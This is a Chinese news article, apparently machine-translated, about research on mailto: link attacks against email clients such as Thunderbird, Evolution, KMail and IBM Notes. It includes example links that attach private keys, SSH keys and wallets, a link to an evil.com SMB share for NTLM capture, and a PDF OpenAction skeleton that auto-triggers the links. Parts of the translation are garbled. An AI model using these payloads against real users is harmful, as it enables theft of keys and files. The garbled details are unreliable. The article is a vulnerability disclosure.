波鴻魯爾大學(德國)的研究人員 () 處理有進階參數的「mailto:」連結時郵件用戶端的行為。 檢查的 XNUMX 個電子郵件用戶端中有 XNUMX 個容易受到使用「attach」參數操縱資源替換的攻擊。 另外六個電子郵件用戶端容易受到 PGP 和 S/MIME 金鑰替換攻擊,三個用戶端容易受到提取加密郵件內容的攻擊。
連結 «「用於自動開啟電子郵件用戶端,以便向連結中指定的收件者寫信。 除了地址之外,您還可以指定其他參數作為連結的一部分,例如信件的主題和典型內容的範本。 建議的攻擊操縱“attach”參數,該參數允許您將附件附加到生成的訊息中。
郵件用戶端Thunderbird、GNOME Evolution (CVE-2020-11879)、KDE KMail (CVE-2020-11880)、IBM/HCL Notes (CVE-2020-4089) 和Pegasus Mail 容易受到允許您自動附加的微不足道的微不足道的攻擊任何本機文件,透過「mailto:?attach=path_to_file」等連結指定。 該文件是在不顯示警告的情況下附加的,因此如果沒有特別注意,用戶可能不會注意到該信件將帶有附件發送。
例如,使用類似「mailto:[電子郵件保護]&subject=Title&body=Text&attach=~/.gnupg/secring.gpg" 您可以將 GnuPG 中的私鑰插入信件中。 您也可以發送加密錢包 (~/.bitcoin/wallet.dat)、SSH 金鑰 (~/.ssh/id_rsa) 以及任何使用者可存取的文件的內容。 此外,Thunderbird 允許您使用「attach=/tmp/*.txt」等結構透過遮罩附加檔案組。
除了本機檔案之外,某些電子郵件用戶端還處理網路儲存的連結和 IMAP 伺服器中的路徑。 特別是,IBM Notes 允許您在處理「attach=\\evil.com\dummyfile」等連結時從網路目錄傳輸文件,以及透過向攻擊者控制的 SMB 伺服器發送連結來攔截 NTLM 驗證參數(請求將與當前的身份驗證參數使用者一起發送)。
Thunderbird 成功處理「attach=imap:///fetch>UID>/INBOX>1/」等請求,這允許您附加 IMAP 伺服器上資料夾中的內容。 同時,從 IMAP 檢索並透過 OpenPGP 和 S/MIME 加密的郵件在發送前會由郵件用戶端自動解密。 Thunderbird 的開發者是 關於二月份的問題和問題中 該問題已解決(Thunderbird 分支 52、60 和 68 仍然容易受到攻擊)。
舊版的 Thunderbird 也容易受到研究人員提出的另外兩種針對 PGP 和 S/MIME 的攻擊變體的攻擊。 特別是,Thunderbird 以及 OutLook、PostBox、eM Client、MailMate 和 R2Mail2 都受到金鑰替換攻擊,原因是郵件用戶端自動導入並安裝在 S/MIME 訊息中傳輸的新證書,從而允許攻擊者組織替換用戶已儲存的公鑰。
Thunderbird、PostBox 和 MailMate 容易受到第二種攻擊,它操縱自動保存草稿訊息機制的功能,並允許使用 mailto 參數啟動加密訊息的解密或為任意訊息添加數位簽名,其中隨後將結果傳輸到攻擊者的IMAP伺服器. 在本次攻擊中,密文透過「body」參數傳輸,並使用「meta刷新」標籤向攻擊者的IMAP伺服器發動呼叫。 例如: ' '
要自動處理「mailto:」連結而無需使用者交互,可以使用專門設計的 PDF 文件 - PDF 中的 OpenAction 操作可讓您在開啟文件時自動啟動 mailto 處理程序:
%PDF-1.5
1 0 對象
<< /類型 /Catalog /OpenAction [2 0 R] >>
結束對象
2 0 對象
<< /Type /Action /S /URI/URI (mailto:?body=——BEGIN PGP MESSAGE——[…])>>
結束對象
來源: opennet.ru